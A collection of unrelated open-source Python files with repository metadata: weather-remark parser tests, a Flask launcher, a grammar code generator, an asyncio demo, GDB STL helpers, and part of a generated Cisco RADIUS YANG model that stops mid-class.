equals = f"6-hour {ttype} temperature {temp}"
self.assertEqual(remarks.temp_minmax(code), equals)
def test_pressure_tendency(self):
"""
Tests translating the pressure tendency code
"""
for code, pressure in (("50123", "12.3"), ("54987", "98.7"), ("51846", "84.6")):
equals = (
"3-hour pressure difference: +/- "
f"{pressure} mb - {static.taf.PRESSURE_TENDENCIES[code[1]]}"
)
self.assertEqual(remarks.pressure_tendency(code), equals)
def test_precip_36(self):
"""
Tests translating the three and six hour precipitation code
"""
for code, three, six in (("60720", 7, 20), ("60000", 0, 0), ("60104", 1, 4)):
equals = (
f"Precipitation in the last 3 hours: {three} in. - 6 hours: {six} in."
)
self.assertEqual(remarks.precip_36(code), equals)
def test_precip_24(self):
"""
Tests translating the 24-hour precipitation code
"""
for code, precip in (("70016", 16), ("79999", 9999), ("70000", 0)):
equals = f"Precipitation in the last 24 hours: {precip} in."
self.assertEqual(remarks.precip_24(code), equals)
def test_sunshine_duration(self):
"""
Tests translating the sunshine duration code
"""
for code, minutes in (("90000", 0), ("99999", 9999), ("91234", 1234)):
equals = f"Duration of sunlight: {minutes} minutes"
self.assertEqual(remarks.sunshine_duration(code), equals)
def test_parse(self):
"""
Tests generating RemarksData from a remarks string
"""
for rmk, data in (
("", (None, None)),
("T09870123", ("12.3", "98.7")),
("RMK AO2 SLP141 T02670189 $", ("18.9", "26.7")),
):
data = [core.make_number(d) for d in data]
self.assertEqual(remarks.parse(rmk), structs.RemarksData(*data))
def test_translate(self):
"""
Tests extracting translations from the remarks string
"""
for rmk, out in (
(
"RMK AO1 ACFT MSHP SLP137 T02720183 BINOVC",
{
"ACFT MSHP": "Aircraft mishap",
"AO1": "Automated with no precipitation sensor",
"BINOVC": "Breaks in Overcast",
"SLP137": "Sea level pressure: 1013.7 hPa",
"T02720183": "Temperature 27.2°C and dewpoint 18.3°C",
},
),
(
"RMK AO2 51014 21045 60720 70016",
{
"21045": "6-hour minimum temperature -4.5°C",
"51014": "3-hour pressure difference: +/- 1.4 mb - Increasing, then steady",
"60720": "Precipitation in the last 3 hours: 7 in. - 6 hours: 20 in.",
"70016": "Precipitation in the last 24 hours: 16 in.",
"AO2": "Automated with precipitation sensor",
},
),
(
"RMK 91234 TSB20 P0123 NOSPECI $",
{
"$": "ASOS requires maintenance",
"91234": "Duration of sunlight: 1234 minutes",
"NOSPECI": "No SPECI reports taken",
"P0123": "Hourly precipitation: 1.23 in.",
"TSB20": "Thunderstorm began at :20",
},
),
):
self.assertEqual(remarks.translate(rmk), out)
| {
"content_hash": "44fc4e142e2570ae10cccb3d16032b2b",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 96,
"avg_line_length": 35.943548387096776,
"alnum_prop": 0.5054969710567646,
"repo_name": "flyinactor91/AVWX-Engine",
"id": "bbfcd53c85ffa826ee49157c2e34e83a8e5fb925",
"size": "4466",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/parsing/test_remarks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "172268"
}
],
"symlink_target": ""
} |
from application import application as app
import settings
import request
import database
if __name__ == "__main__":
database.init_db()
app.run()
| {
"content_hash": "9854b3d52837a5b1e787c549f99816fa",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 42,
"avg_line_length": 19.375,
"alnum_prop": 0.6967741935483871,
"repo_name": "peixinchen/TravisCITest",
"id": "5d5da0500230fe95d6b72b6e5ac9fa9caf8330c6",
"size": "155",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/togo/togo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "919"
},
{
"name": "Python",
"bytes": "4586"
}
],
"symlink_target": ""
} |
import hashlib
import importlib
import os
import requests
GRAMMAR_FILE_NAME = "__init__.py"
GRAMMAR_FOLDER_NAME = "gen"
GRAMMAR_ID = "5a0bc90e734d1d08bf70e0ff"
GRAMMAR_URL = "http://localhost:2666/grammar/{}".format(GRAMMAR_ID)
class GrammarRule:
def __init__(self, text, data_hash):
self.text = text
self.data_hash = data_hash
class GrammarRuleFactory:
def __init__(self):
self.rules = {}
def _get_hash_from_dict(self, d):
return hashlib.md5(str(d).encode('utf-8')).hexdigest()
def get_or_create_rule(self, rulename, details, keywords):
"""
Creates a GrammarRule if it doesn't exist
"""
if rulename not in self.rules.keys() or self.rules[rulename].data_hash != self._get_hash_from_dict(details):
func_string = self._get_func_string(rulename, details, keywords)
self.rules[rulename] = GrammarRule(func_string, self._get_hash_from_dict(details))
return self.rules[rulename]
def delete_rule(self, rulename):
"""
Deletes a rule
"""
if rulename in self.rules:
del self.rules[rulename]
def _get_func_string(self, rulename, details, keywords):
res = "def {}(): ".format(rulename)
if details['type'] == 'variable':
res += "return RegExMatch(r'{}')".format(details['value'][0])
elif details['type'] == 'rule':
res += "return "
final_value = ''
if details['join'] == 'and':
final_value += "{}".format(", ".join(self._fix_list(details['value'], keywords)))
elif details['join'] == 'or':
final_value += "[{}]".format(", ".join(self._fix_list(details['value'], keywords)))
if details['oneOrMore']:
final_value = "OneOrMore({}, sep=',')".format(final_value)
res += final_value
return res
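    # Illustrative examples (not from the original source) of strings that
    # _get_func_string generates; the rule names and values are assumptions:
    #
    #   {'type': 'variable', 'value': [r'\w+']}
    #       -> "def word(): return RegExMatch(r'\w+')"
    #   {'type': 'rule', 'join': 'or', 'oneOrMore': False,
    #    'value': ['word', 'select']}  (with 'select' in keywords)
    #       -> 'def query(): return [word, "select"]'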
def _fix_list(self, l, keywords):
result = []
for item in l:
if item in keywords:
result.append('"{}"'.format(item))
else:
result.append(item)
return result
grammarRuleFactory = GrammarRuleFactory()
class GrammarState:
current_hash = ''
primary_key = None
gen_module = None
def _verify_hash(data):
if data['hash'] == GrammarState.current_hash:
return True
GrammarState.current_hash = data['hash']
return False
def _generate_file_from_data(data):
if _verify_hash(data):
        importlib.reload(GrammarState.gen_module)
        return  # grammar unchanged; reuse the previously generated module
keywords = set(data['keywords'])
variables = set(data['variables'])
grammar_folder_path = os.path.dirname(__file__) + "/" + GRAMMAR_FOLDER_NAME
if not os.path.isdir(grammar_folder_path):
os.mkdir(grammar_folder_path)
grammar_file_path = grammar_folder_path + "/" + GRAMMAR_FILE_NAME
with open(grammar_file_path, "w+") as grammar_file:
grammar_file.write("# AUTOMATICALLY GENERATED\n")
grammar_file.write("from arpeggio import Optional, ZeroOrMore, OneOrMore, EOF, ParserPython, NoMatch, RegExMatch\n\n")
for rulename, details in data['structure'].items():
rule = grammarRuleFactory.get_or_create_rule(rulename, details, keywords)
if details['isPrimary']:
GrammarState.primary_key = rulename
grammar_file.write(rule.text)
grammar_file.write('\n\n')
GrammarState.gen_module = importlib.import_module(GRAMMAR_FOLDER_NAME)
importlib.reload(GrammarState.gen_module)
def get_grammar_root():
res = requests.get(GRAMMAR_URL)
_generate_file_from_data(res.json())
return GrammarState.gen_module.root
| {
"content_hash": "9d760e67f29befef4d3d24a54974759a",
"timestamp": "",
"source": "github",
"line_count": 116,
"max_line_length": 126,
"avg_line_length": 31.896551724137932,
"alnum_prop": 0.6040540540540541,
"repo_name": "Zubdano/zql",
"id": "a8ee5d32c2c70e06fe3de0c42022348f4c5af8c0",
"size": "3700",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "zql-backend/interpreter/generate.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "11853"
},
{
"name": "HTML",
"bytes": "587"
},
{
"name": "JavaScript",
"bytes": "50515"
},
{
"name": "Python",
"bytes": "52350"
},
{
"name": "Shell",
"bytes": "1051"
}
],
"symlink_target": ""
} |
"""
Demonstration of the asyncio module in Python 3.5
This simulation is composed of three layers, each of which will split up the
data into some different subsets, pass the subsets off to the next layer, wait
for results, and then do some non-trivial processing to return to the previous
layer (in this case, sleeping for a few seconds). The expensive operations are
offloaded to a ThreadPoolExecutor, which maintains a pool of processing
threads, allowing for the utilization of multiple cores (hypothetically).
"""
import asyncio
import logging
import time
from concurrent.futures import ThreadPoolExecutor
logging.basicConfig(format="[%(thread)-5d]%(asctime)s: %(message)s")
logger = logging.getLogger('async')
logger.setLevel(logging.INFO)
executor = ThreadPoolExecutor(max_workers=10)
loop = asyncio.get_event_loop()
def cpu_bound_op(exec_time, *data):
"""
Simulation of a long-running CPU-bound operation
:param exec_time: how long this operation will take
:param data: data to "process" (sum it up)
:return: the processed result
"""
logger.info("Running cpu-bound op on {} for {} seconds".format(data, exec_time))
time.sleep(exec_time)
return sum(data)
async def process_pipeline(data):
# just pass the data along to level_a and return the results
results = await level_a(data)
return results
async def level_a(data):
# tweak the data a few different ways and pass them each to level b.
level_b_inputs = data, 2*data, 3*data
results = await asyncio.gather(*[level_b(val) for val in level_b_inputs])
# we've now effectively called level_b(...) three times with three inputs,
# and (once the await returns) they've all finished, so now we'll take
# the results and pass them along to our own long-running CPU-bound
# process via the thread pool.
# Note the signature of run_in_executor: (executor, func, *args)
# The third argument and beyond will be passed to cpu_bound_op when it is called.
result = await loop.run_in_executor(executor, cpu_bound_op, 3, *results)
# level a processing is now done, pass back the results
return result
async def level_b(data):
# similar to level a
level_c_inputs = data/2, data/4, data/7
results = await asyncio.gather(*[level_c(val) for val in level_c_inputs])
result = await loop.run_in_executor(executor, cpu_bound_op, 2, *results)
return result
async def level_c(data):
# final level - queue up the long-running CPU-bound process in the
# thread pool immediately
result = await loop.run_in_executor(executor, cpu_bound_op, 1, data)
return result
def main():
start_time = time.time()
result = loop.run_until_complete(process_pipeline(2.5))
logger.info("Completed ({}) in {} seconds".format(result, time.time() - start_time))
if __name__ == '__main__':
main()
| {
"content_hash": "3506e5f89d26e4adaffc7b3618f52b36",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 88,
"avg_line_length": 39.72222222222222,
"alnum_prop": 0.7115384615384616,
"repo_name": "dmeklund/asyncdemo",
"id": "6831711c626bab222298b8b4c9f5c2d8b098409b",
"size": "2860",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "asynctest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7494"
}
],
"symlink_target": ""
} |
def foo():
return
| {
"content_hash": "654ff048c99c42003de447473d81bee5",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 10,
"avg_line_length": 11,
"alnum_prop": 0.5454545454545454,
"repo_name": "doboy/Underscore",
"id": "a4a7def833c4da7503c1f61d81ec3c632f21efe1",
"size": "22",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/empty_return_statement.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "410"
},
{
"name": "Python",
"bytes": "49556"
}
],
"symlink_target": ""
} |
try:
import gdb
except ImportError as e:
raise ImportError("This script must be run in GDB: ", str(e))
import sys
import os
sys.path.append(os.getcwd())
import stl_containers
import simple_class_obj
SIZE_OF_INT = 4
SIZE_OF_BOOL = 1
SIZE_OF_INT64 = 8
SIZE_OF_UINT256 = 32
def get_special_type_obj(gobj):
obj_type = gobj.type.strip_typedefs()
if stl_containers.VectorObj.is_this_type(obj_type):
return stl_containers.VectorObj(gobj)
if stl_containers.ListObj.is_this_type(obj_type):
return stl_containers.ListObj(gobj)
if stl_containers.PairObj.is_this_type(obj_type):
return stl_containers.PairObj(gobj)
if stl_containers.MapObj.is_this_type(obj_type):
return stl_containers.MapObj(gobj)
if stl_containers.SetObj.is_this_type(obj_type):
return stl_containers.SetObj(gobj)
if simple_class_obj.SimpleClassObj.is_this_type(obj_type):
return simple_class_obj.SimpleClassObj(gobj)
return False
def is_special_type(obj_type):
if stl_containers.VectorObj.is_this_type(obj_type):
return True
if stl_containers.ListObj.is_this_type(obj_type):
return True
if stl_containers.PairObj.is_this_type(obj_type):
return True
if stl_containers.MapObj.is_this_type(obj_type):
return True
if stl_containers.SetObj.is_this_type(obj_type):
return True
if simple_class_obj.SimpleClassObj.is_this_type(obj_type):
return True
return False
def get_instance_size(gobj):
obj = get_special_type_obj(gobj)
if not obj:
return gobj.type.sizeof
return obj.get_used_size()
| {
"content_hash": "bbbce8e580b2f007b754fe90c47f2cbf",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 65,
"avg_line_length": 30.166666666666668,
"alnum_prop": 0.6899938612645795,
"repo_name": "ivansib/sibcoin",
"id": "7dcc6c021db60e95e5f0b8416a21ad3958676f90",
"size": "1650",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "contrib/auto_gdb/common_helpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "28456"
},
{
"name": "C",
"bytes": "4039577"
},
{
"name": "C++",
"bytes": "6212205"
},
{
"name": "CMake",
"bytes": "1881"
},
{
"name": "CSS",
"bytes": "255014"
},
{
"name": "Dockerfile",
"bytes": "237"
},
{
"name": "HTML",
"bytes": "137533"
},
{
"name": "Java",
"bytes": "30290"
},
{
"name": "M4",
"bytes": "190865"
},
{
"name": "Makefile",
"bytes": "112613"
},
{
"name": "Objective-C",
"bytes": "3798"
},
{
"name": "Objective-C++",
"bytes": "7230"
},
{
"name": "Python",
"bytes": "1028306"
},
{
"name": "QMake",
"bytes": "960"
},
{
"name": "Shell",
"bytes": "49937"
}
],
"symlink_target": ""
} |
"""
dotfiles
~~~~~~~~
Dotfiles is a tool to make managing your dotfile symlinks in $HOME easy,
allowing you to keep all your dotfiles in a single directory. Hosting is
up to you. You can use a VCS like git, Dropbox, or even rsync to distribute
your dotfiles repository across multiple hosts.
:copyright: (c) 2011-2014 by Jon Bernard.
:license: ISC, see LICENSE.rst for more details.
"""
__version__ = '0.6.4'
| {
"content_hash": "1f71d3ed003867d76c7df00e08e1aafa",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 79,
"avg_line_length": 31.785714285714285,
"alnum_prop": 0.6741573033707865,
"repo_name": "jawilson/dotfiles",
"id": "226c06e2586bf2f5ec1e16f28f1c84cfb7561c91",
"size": "445",
"binary": false,
"copies": "5",
"ref": "refs/heads/main",
"path": "tools/dotfiles/dotfiles/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "3729"
},
{
"name": "Erlang",
"bytes": "3232"
},
{
"name": "JavaScript",
"bytes": "1064"
},
{
"name": "Makefile",
"bytes": "686"
},
{
"name": "Python",
"bytes": "417032"
},
{
"name": "Ruby",
"bytes": "26905"
},
{
"name": "Shell",
"bytes": "538313"
},
{
"name": "Vim script",
"bytes": "1796488"
}
],
"symlink_target": ""
} |
""" Cisco_IOS_XR_aaa_protocol_radius_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR aaa\-protocol\-radius package operational data.
This module contains definitions
for the following management objects\:
radius\: RADIUS operational data
This YANG module augments the
Cisco\-IOS\-XR\-aaa\-locald\-oper
module with state data.
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class Radius(object):
"""
RADIUS operational data
.. attribute:: nodes
Contains all the nodes
**type**\: :py:class:`Nodes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.nodes = Radius.Nodes()
self.nodes.parent = self
class Nodes(object):
"""
Contains all the nodes
.. attribute:: node
RADIUS operational data for a particular node
**type**\: list of :py:class:`Node <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.node = YList()
self.node.parent = self
self.node.name = 'node'
class Node(object):
"""
RADIUS operational data for a particular node
.. attribute:: node_name <key>
Node name
**type**\: str
**pattern:** ([a\-zA\-Z0\-9\_]\*\\d+/){1,2}([a\-zA\-Z0\-9\_]\*\\d+)
.. attribute:: accounting
RADIUS accounting data
**type**\: :py:class:`Accounting <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Accounting>`
.. attribute:: authentication
RADIUS authentication data
**type**\: :py:class:`Authentication <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Authentication>`
.. attribute:: client
RADIUS client data
**type**\: :py:class:`Client <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Client>`
.. attribute:: dead_criteria
RADIUS dead criteria information
**type**\: :py:class:`DeadCriteria <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.DeadCriteria>`
.. attribute:: dynamic_authorization
Dynamic authorization data
**type**\: :py:class:`DynamicAuthorization <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.DynamicAuthorization>`
.. attribute:: server_groups
RADIUS server group table
**type**\: :py:class:`ServerGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.ServerGroups>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.node_name = None
self.accounting = Radius.Nodes.Node.Accounting()
self.accounting.parent = self
self.authentication = Radius.Nodes.Node.Authentication()
self.authentication.parent = self
self.client = Radius.Nodes.Node.Client()
self.client.parent = self
self.dead_criteria = Radius.Nodes.Node.DeadCriteria()
self.dead_criteria.parent = self
self.dynamic_authorization = Radius.Nodes.Node.DynamicAuthorization()
self.dynamic_authorization.parent = self
self.server_groups = Radius.Nodes.Node.ServerGroups()
self.server_groups.parent = self
class Client(object):
"""
RADIUS client data
.. attribute:: authentication_nas_id
NAS\-Identifier of the RADIUS authentication client
**type**\: str
.. attribute:: unknown_accounting_responses
Number of RADIUS accounting responses packets received from unknown addresses
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_authentication_responses
Number of RADIUS access responses packets received from unknown addresses
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.authentication_nas_id = None
self.unknown_accounting_responses = None
self.unknown_authentication_responses = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:client'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.authentication_nas_id is not None:
return True
if self.unknown_accounting_responses is not None:
return True
if self.unknown_authentication_responses is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.Client']['meta_info']
class DeadCriteria(object):
"""
RADIUS dead criteria information
.. attribute:: hosts
RADIUS server dead criteria host table
**type**\: :py:class:`Hosts <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.DeadCriteria.Hosts>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.hosts = Radius.Nodes.Node.DeadCriteria.Hosts()
self.hosts.parent = self
class Hosts(object):
"""
RADIUS server dead criteria host table
.. attribute:: host
RADIUS Server
**type**\: list of :py:class:`Host <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.DeadCriteria.Hosts.Host>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.host = YList()
self.host.parent = self
self.host.name = 'host'
class Host(object):
"""
RADIUS Server
.. attribute:: acct_port_number
Accounting Port number (standard port 1646)
**type**\: int
**range:** 1..65535
.. attribute:: auth_port_number
Authentication Port number (standard port 1645)
**type**\: int
**range:** 1..65535
.. attribute:: ip_address
IP address of RADIUS server
**type**\: one of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
----
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
----
.. attribute:: time
Time in seconds
**type**\: :py:class:`Time <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.DeadCriteria.Hosts.Host.Time>`
.. attribute:: tries
Number of tries
**type**\: :py:class:`Tries <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.DeadCriteria.Hosts.Host.Tries>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.acct_port_number = None
self.auth_port_number = None
self.ip_address = None
self.time = Radius.Nodes.Node.DeadCriteria.Hosts.Host.Time()
self.time.parent = self
self.tries = Radius.Nodes.Node.DeadCriteria.Hosts.Host.Tries()
self.tries.parent = self
class Time(object):
"""
Time in seconds
.. attribute:: is_computed
True if computed; false if not
**type**\: bool
.. attribute:: value
Value for time or tries
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.is_computed = None
self.value = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:time'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.is_computed is not None:
return True
if self.value is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.DeadCriteria.Hosts.Host.Time']['meta_info']
class Tries(object):
"""
Number of tries
.. attribute:: is_computed
True if computed; false if not
**type**\: bool
.. attribute:: value
Value for time or tries
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.is_computed = None
self.value = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:tries'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.is_computed is not None:
return True
if self.value is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.DeadCriteria.Hosts.Host.Tries']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:host'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.acct_port_number is not None:
return True
if self.auth_port_number is not None:
return True
if self.ip_address is not None:
return True
if self.time is not None and self.time._has_data():
return True
if self.tries is not None and self.tries._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.DeadCriteria.Hosts.Host']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:hosts'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.host is not None:
for child_ref in self.host:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.DeadCriteria.Hosts']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:dead-criteria'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.hosts is not None and self.hosts._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_protocol_radius_oper as meta
return meta._meta_table['Radius.Nodes.Node.DeadCriteria']['meta_info']
class Authentication(object):
"""
RADIUS authentication data
.. attribute:: authentication_group
List of authentication groups
**type**\: list of :py:class:`AuthenticationGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Authentication.AuthenticationGroup>`
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.authentication_group = YList()
self.authentication_group.parent = self
self.authentication_group.name = 'authentication_group'
class AuthenticationGroup(object):
"""
List of authentication groups
.. attribute:: authentication
Authentication data
**type**\: :py:class:`Authentication_ <ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_protocol_radius_oper.Radius.Nodes.Node.Authentication.AuthenticationGroup.Authentication_>`
.. attribute:: family
IP address Family
**type**\: str
.. attribute:: ip_address
IP address buffer
**type**\: str
.. attribute:: port
Authentication port number
**type**\: int
**range:** 0..4294967295
.. attribute:: server_address
IP address of RADIUS server
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.authentication = Radius.Nodes.Node.Authentication.AuthenticationGroup.Authentication_()
self.authentication.parent = self
self.family = None
self.ip_address = None
self.port = None
self.server_address = None
class Authentication_(object):
"""
Authentication data
.. attribute:: access_accepts
Number of access accepts
**type**\: int
**range:** 0..4294967295
.. attribute:: access_challenges
Number of access challenges
**type**\: int
**range:** 0..4294967295
.. attribute:: access_rejects
Number of access rejects
**type**\: int
**range:** 0..4294967295
.. attribute:: access_request_retransmits
Number of retransmitted access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: access_requests
Number of access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: access_timeouts
Number of access packets timed out
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_incorrect_responses
Number of incorrect authentication responses
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_response_time
Average response time for authentication requests
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_server_error_responses
Number of server error authentication responses
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_transaction_failure
Number of failed authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_transaction_successess
Number of succeeded authentication transactions
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_unexpected_responses
Number of unexpected authentication responses
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_access_authenticators
Number of bad access authenticators
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_access_responses
Number of bad access responses
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_access_responses
Number of access responses dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: pending_access_requests
Number of pending access requests
**type**\: int
**range:** 0..4294967295
.. attribute:: rtt
Round trip time for authentication in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: unknown_access_types
Number of packets received with unknown type from authentication server
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'aaa-protocol-radius-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.access_accepts = None
self.access_challenges = None
self.access_rejects = None
self.access_request_retransmits = None
self.access_requests = None
self.access_timeouts = None
self.authen_incorrect_responses = None
self.authen_response_time = None
self.authen_server_error_responses = None
self.authen_transaction_failure = None
self.authen_transaction_successess = None
self.authen_unexpected_responses = None
self.bad_access_authenticators = None
self.bad_access_responses = None
self.dropped_access_responses = None
self.pending_access_requests = None
self.rtt = None
self.unknown_access_types = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-aaa-protocol-radius-oper:authentication'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if self.access_accepts is not None:
return True
if self.access_challenges is not None:
return True
if self.access_rejects is not None:
return True
if self.access_request_retransmits is not None:
return True
if self.access_requests is not None:
return True
if self.access_timeouts is not None:
return True
if self.authen_incorrect_responses is not None:
return True
if self.authen_response_time is not None:
return True
if self.authen_server_error_responses is not None:
return True
if self.authen_transaction_failure is not None:
return True
if self.authen_transaction_successess is not None:
return True
if self.authen_unexpected_responses is not None:
return True
if self.bad_access_authenticators is not None:
return True
if self.bad_access_responses is not None:
return True
if self.dropped_access_responses is not None:
return True
if self.pending_access_requests is not None:
return True
if self.rtt is not None:
return True
if self.unknown_access_types is not None:
return True
return False
@staticmethod
def _meta_info():
